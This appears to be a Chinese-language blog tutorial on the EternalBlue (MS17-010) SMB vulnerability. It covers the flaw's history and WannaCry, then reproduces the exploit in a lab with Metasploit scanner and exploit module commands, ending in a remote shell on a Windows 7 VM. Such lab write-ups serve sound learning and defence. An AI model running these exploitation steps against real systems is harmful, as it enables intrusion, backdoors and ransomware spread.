永恒之蓝
定义:
永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010。该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。
概况
“永恒之蓝”是“Shadow Brokers”在2017年4月14日公开的漏洞利用工具之一,由于受“永恒之蓝”漏洞影响的系统非常多、漏洞利用条件限制少、攻击成功率高、现成利用工具方便,因此从2017年4月份被公开以后,被众多不法分子用来传播病毒木马。其中传播勒索病毒、虚拟货币挖矿木马、远程控制木马时,“永恒之蓝”已成为黑客的习惯性选择。因此建议用户一定要打“永恒之蓝”对应的补丁。
漏洞利用
由于永恒之蓝利用工具会扫描开放445文件共享端口的Windows机器,所以如果用户开启445端口并且系统未打MS17-010补丁就会在无感状态下被不法分子向系统植入恶意代码。例如:WannaCry事件中,不法分子用永恒之蓝攻陷一台机器后会向该机器继续下发并运行永恒之蓝利用工具,让被攻陷的机器继续去扫描其他开放445端口的机器的同时下发并运行勒索病毒,加密用户系统中的文件,达到蠕虫式的传播,从而对全球上百个国家造成巨大影响。
复现
环境
1.kali2022.4虚拟机 实验中IP:192.168.8.132
window 7虚拟机 实验中IP:192.168.8.135
保证kali与win7相互ping通:
2.并将win7虚拟机防火墙关闭
在kali中启动metasploit(msf)工具
输入msfconsole
先去在msf中找一下msf的脚本
search ms17-010
使用ms17-010的辅助性脚本
use auxiliary/scanner/smb/smb_ms17_010 #使用ms17-010的辅助模块
配置ms17-010的辅助性脚本
show options #查看有哪些项需要进行配置
set rhosts 192.168.8.135 #配置要攻击的靶机的ip地址
配置完成后,执行ms17-010的辅助性脚本
run #运行模块
发现这台win7系统存在MS17-010漏洞
接着使用ms17-010攻击性模块
use exploit/windows/smb/ms17_010_eternalblue #使用ms17-010的攻击模块
并查看配置项
show options #查看配置项
设置被攻击机器ip
set rhosts 192.168.8.135 #设置被攻击机器ip
运行ms17-010攻击模块
run
此时复现成功!!!
我们可以输入shell进入win7的执行终端
退出终端输入exit
复现成功后可以对目标机进行一系列操作,例如远程监控监听,查看系统数据,植入后门等等,我就不一一演示啦,希望对大家有所帮助!
上面是一个简单的演示,漏洞的危害有很多,真正的攻击危害性会更大